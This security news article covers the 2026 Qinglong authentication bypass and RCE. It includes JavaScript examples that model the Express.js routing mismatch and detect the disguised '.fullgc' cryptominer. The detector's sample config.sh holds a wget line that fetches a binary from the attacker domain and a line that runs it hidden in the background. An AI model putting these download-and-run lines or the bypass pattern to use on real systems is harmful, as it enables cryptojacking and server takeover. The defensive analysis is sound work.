Qinglong RCE Vulnerability: Express.js Bypass Revealed
RCE authentication bypass discovered in Qinglong: how Express.js routing differences enabled the attack and why payload filtering fails.

Over 19,400 stars and 3,200 forks on GitHub: this is the potential impact of the RCE (Remote Code Execution) vulnerabilities that hit the Qinglong project between February and March 2026. The flaws, classified as CVE-2026-3965 and CVE-2026-4047, allowed attackers to bypass authentication and take control of publicly exposed panels, installing sophisticated cryptominers and compromising broader monitoring infrastructures.
The context of RCE vulnerabilities
Remote Code Execution (RCE) vulnerabilities have long been considered among the most dangerous in the cybersecurity landscape, as they allow attackers to execute malicious code directly on the target machine. Historically, flaws of this type have had devastating consequences: in December 2021, multiple RCE vulnerabilities in Log4J allowed vulnerable applications to be exploited to distribute cryptojackers and other malware. Similarly, in 2017, the WannaCry ransomware spread on a massive scale by exploiting the EternalBlue vulnerability in the SMB protocol, allowing the execution of malicious code and the encryption of files. As highlighted by Cyberment experts, RCEs are ranked among the most critical types of flaws precisely because of the level of access they grant to the attacker.
In the specific case of Qinglong, versions 2.20.1 and earlier were affected by a logic flaw in how authorization was enforced. The attack began between February 7 and 8, 2026, when the first exploits started hitting exposed panels, even before the vulnerabilities were made public. Only on February 27, 2026, were the authentication bypass flaws publicly reported through Issues #2933 and #2934 on GitHub, and on March 1, 2026, the project maintainer confirmed the security vulnerability, urging users to promptly update their systems.
The discrepancy in Express.js routing
The technical core of vulnerabilities CVE-2026-3965 and CVE-2026-4047 lies in a logical mismatch between the authorization managed by the middleware and the routing of the Express.js framework. As highlighted by Snyk's analysis, "The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently."
This divergence in interpreting URL paths created a vulnerability window that attackers exploited to evade security checks and reach administrative functionality without valid credentials. Because the Express.js router resolved requests differently from what the authentication layer assumed, endpoints that should have been protected were left exposed, allowing the execution of arbitrary commands on the server.
Why blocking the payload is ineffective
Faced with the active exploitation of a vulnerability, developers' instinctive reaction is often to immediately block the observed malicious payload. However, this strategy proved insufficient in Qinglong's case. On February 8, 2026, in response to the ongoing attacks, Copilot SWE Agent submitted PR #2924 to address the shell injection issue in configuration files. This mitigation attempt, however, was never merged into the main project because it limited itself to filtering the specific payload without solving the root cause.
The security lesson here is central: treating the symptom rather than the disease opens the door to future evasions. As Snyk pointed out, "When an application is being actively exploited, the instinct is to block the observed payload. But if the root cause is an auth bypass, payload-level filtering is insufficient — attackers will simply pivot to a different payload."
The effective solution came with PR #2941, which fixed the authentication bypass by actually resolving the routing discrepancy at its root, instead of simply applying a patch to the observed payloads. This intervention eliminated the attack surface, rendering any variant of the original payload useless.
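The routing mismatch described above, and the reason a payload blocklist cannot close it, can be modelled in a few dozen lines. The following is an added example, not code from Qinglong, Express.js or either PR: the specific divergence it uses (an exact-string prefix check in the auth layer versus case-insensitive, trailing-slash-tolerant route matching, which is Express's default behaviour) is an assumption chosen for illustration, since the article does not say which divergence affected Qinglong. The route names, markers and request bodies are constructed.

```javascript
// Added example, not Qinglong's or Express's code. Models an auth layer and a
// router that answer "which route does this URL reach?" differently.

// Stand-in for Express-style default route matching: case-insensitive and a
// trailing slash is ignored (assumption: this is the divergence being modelled).
function routerMatches(routePath, requestPath) {
  const norm = (p) => (p.replace(/\/+$/, '') || '/').toLowerCase();
  return norm(routePath) === norm(requestPath);
}

const PUBLIC_PATHS = ['/api/login', '/api/health']; // constructed
const PROTECTED_PREFIX = '/api/';

// Vulnerable decision: "protected" is derived from the raw string, so any
// spelling the router accepts but this check does not is waved through.
function vulnerableAuth(req) {
  const isProtected =
    req.path.startsWith(PROTECTED_PREFIX) && !PUBLIC_PATHS.includes(req.path);
  return !isProtected || req.authenticated === true;
}

// Hardened decision: deny by default, and recognise public routes with the same
// matcher the router uses, so both layers interpret the URL identically.
function hardenedAuth(req) {
  const isPublic = PUBLIC_PATHS.some((p) => routerMatches(p, req.path));
  return isPublic || req.authenticated === true;
}

// Symptom-level mitigation: reject bodies containing a marker seen in one attack.
const BLOCKED_MARKERS = ['marker-seen-in-attack-A']; // constructed placeholder
function payloadFilterAllows(body) {
  return !BLOCKED_MARKERS.some((m) => body.includes(m));
}

// Simulated request pipeline: auth middleware, optional payload filter, routing.
function handle(req, { auth, filterPayload = false }) {
  if (!auth(req)) return { status: 401 };
  if (filterPayload && !payloadFilterAllows(req.body)) return { status: 400 };
  const routes = {
    '/api/config': () => `config updated: ${req.body}`,
    '/api/health': () => 'ok',
  };
  for (const [routePath, handler] of Object.entries(routes)) {
    if (routerMatches(routePath, req.path)) return { status: 200, body: handler() };
  }
  return { status: 404 };
}

// Unauthenticated request whose path the naive check does not recognise as
// protected, while the router still resolves it to the config route.
const odd = { path: '/API/config', authenticated: false, body: 'marker-seen-in-attack-A' };
const variant = { ...odd, body: 'marker-seen-in-attack-B' };

// Returns the status each configuration gives, so the contrast is explicit.
function demo() {
  return {
    vulnerable: handle(odd, { auth: vulnerableAuth }).status,                          // 200
    filteredOnly: handle(odd, { auth: vulnerableAuth, filterPayload: true }).status,   // 400
    filteredVariant: handle(variant, { auth: vulnerableAuth, filterPayload: true }).status, // 200
    rootFix: handle(odd, { auth: hardenedAuth }).status,                               // 401
    rootFixVariant: handle(variant, { auth: hardenedAuth }).status,                    // 401
    legitimate: handle({ path: '/api/config', authenticated: true, body: 'x' }, { auth: hardenedAuth }).status, // 200
    publicStillOpen: handle({ path: '/api/health/', authenticated: false, body: '' }, { auth: hardenedAuth }).status, // 200
  };
}

console.log(demo());
```

The payload filter stops only the body it was written for; the same unauthenticated request with any other body still reaches the handler. The hardened decision removes the gap by refusing to derive "protected" from the raw path string at all: everything is protected unless the router's own matcher says it is a public route.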
The .fullgc cryptominer and process hiding
Beyond the vulnerability itself, the attack on Qinglong stood out for its sophisticated malware persistence and hiding techniques. Once access was obtained through the bypass, attackers modified the config.sh file to download cryptomining binaries from the file.551911.xyz domain. The malware, compatible with Linux x86_64, ARM64, and even macOS variants, was saved in the /ql/data/db/.fullgc path.
To disguise the infection and delay investigation by system administrators, the miner process was named '.fullgc'. This choice was not accidental: the name mimics a harmless Java/JVM event known as 'Full Garbage Collection', a routine phase that justifies CPU usage spikes. That spike was precisely the main symptom on compromised machines, with administrators reporting CPU usage between 85% and 100%. Passing off an anomalous computational load as a normal memory cleanup cycle let the cryptominer operate undisturbed for longer.
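A defender checking a host for the hiding pattern described above has a few signals to combine: a GC-like process name whose parent is not a JVM (a real full GC is a phase inside a `java` process, not a separate process), a dot-prefixed command name or executable path, sustained CPU at the levels reported, and the published indicators. The following is an added example, not a tool from the article or the Qinglong project: the process-list lines and config.sh content are constructed, the path /ql/data/db/.fullgc and the domain file.551911.xyz come from the article, and the CPU threshold and the rule that two signals are needed to raise a finding are assumptions.

```javascript
// Added example, not Qinglong's code: host check for the ".fullgc" hiding pattern.
const CPU_THRESHOLD = 85; // article reports 85-100% CPU on compromised hosts (assumed cut-off)
const KNOWN_IOCS = ['/ql/data/db/.fullgc', 'file.551911.xyz']; // from the article

// Parse lines shaped like `ps -eo pid,ppid,pcpu,comm,args` output (constructed sample below).
function parsePsLines(text) {
  return text.trim().split('\n').slice(1).map((line) => {
    const [pid, ppid, pcpu, comm, ...args] = line.trim().split(/\s+/);
    return { pid: Number(pid), ppid: Number(ppid), pcpu: Number(pcpu), comm, args: args.join(' ') };
  });
}

// Combine weak signals; a single one (e.g. high CPU alone) is common in healthy systems.
function findSuspiciousProcesses(procs) {
  const byPid = new Map(procs.map((p) => [p.pid, p]));
  const findings = [];
  for (const p of procs) {
    const reasons = [];
    const parentComm = byPid.get(p.ppid)?.comm ?? '';
    if (/gc/i.test(p.comm) && !/java/i.test(parentComm)) {
      reasons.push('GC-like name but parent is not a JVM');
    }
    if (p.comm.startsWith('.') || /\/\.[^/\s]+/.test(p.args)) {
      reasons.push('hidden (dot-prefixed) name or executable path');
    }
    if (p.pcpu >= CPU_THRESHOLD) reasons.push(`CPU ${p.pcpu}% >= ${CPU_THRESHOLD}%`);
    if (KNOWN_IOCS.some((ioc) => p.args.includes(ioc))) reasons.push('matches published IoC');
    if (reasons.length >= 2) findings.push({ pid: p.pid, comm: p.comm, reasons });
  }
  return findings;
}

// Flag config.sh lines that reference the published domain or path.
function scanConfigSh(text) {
  return text.split('\n')
    .map((line, i) => ({ line: i + 1, text: line }))
    .filter(({ text }) => KNOWN_IOCS.some((ioc) => text.includes(ioc)));
}

// Constructed process list: the .fullgc entry mirrors the article's description.
const SAMPLE_PS = `
  PID  PPID %CPU COMMAND ARGS
    1     0  0.1 init    /sbin/init
  812     1  3.4 node    /app/server.js
  901   812 97.5 .fullgc /ql/data/db/.fullgc
 1204  1100  2.0 java    /usr/bin/java -Xmx2g -jar app.jar
`;

// Constructed config.sh: lines 3-4 reconstruct the kind of tampering described.
const SAMPLE_CONFIG_SH = [
  '# constructed sample config.sh, not a real Qinglong file',
  'SampleSetting="1"',
  'wget -q http://file.551911.xyz/PLACEHOLDER -O /ql/data/db/.fullgc',
  'nohup /ql/data/db/.fullgc >/dev/null 2>&1 &',
].join('\n');

console.log(findSuspiciousProcesses(parsePsLines(SAMPLE_PS)));
console.log(scanConfigSh(SAMPLE_CONFIG_SH));
```

Run against real output of `ps -eo pid,ppid,pcpu,comm,args` and the panel's config.sh, the same functions apply unchanged; the point of requiring two signals is that a busy but legitimate JVM trips only the CPU rule, while the disguised miner trips all four.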
The Nezha monitoring compromise
The consequences of the RCE exploit were not limited to the single machine hosting Qinglong. At least one user reported that attackers exploited the access gained to compromise their Nezha monitoring panel. This further breach provided the attackers with visibility into hundreds of additional machines connected to the monitoring infrastructure, drastically amplifying the attack's reach.
Using management and monitoring software as an entry point to extend compromise is a known tactic. In other contexts, as reported by Matrice Digitale, attackers have exploited vulnerabilities in ASP.NET and Outlook to inject malicious code via modified ViewState, employing post-exploitation trojans like Godzilla to maintain access and distribute commands on target IIS servers. The goal of exploiting initial access to move laterally and exfiltrate data or install ransomware is a constant in advanced RCE threats.
Frequently asked questions
- What is Remote Code Execution (RCE)?
- An RCE vulnerability allows an attacker to execute arbitrary code on a remote system. These flaws are particularly critical because they allow full control of the victim machine, paving the way for the installation of malware, such as ransomware or spyware, and the compromise of further internal infrastructures.
- How did the bypass in Qinglong elude authentication?
- The bypass exploited a logical divergence between the middleware authorization and Express.js routing. The authentication layer assumed that certain URL paths would be handled in a specific way, while the Express.js framework interpreted them differently, leaving sensitive endpoints exposed that should have required credentials.
- Why was the malicious process named .fullgc?
- Attackers renamed the cryptominer process to '.fullgc' to mimic the Java Virtual Machine's 'Full Garbage Collection'. This naming served to justify CPU usage spikes (up to 100%) in the eyes of system administrators, delaying the detection of the anomaly.
This article is a summary based exclusively on the listed sources.
Sources
- https://www.checkpoint.com/it/cyber-hub/cyber-security/what-is-remote-code-execution-rce/
- https://cyberment.it/vulnerabilita-informatiche/vulnerabilita-rce-cosa-sono/
- https://www.matricedigitale.it/2025/03/12/rce-remote-code-execution/
- https://phoenixnap.it/glossario/esecuzione-di-codice-remoto-rce
- https://xygeni.io/sscs-glossary/what-is-rce-vulnerability-remote-code-execution-vulnerability/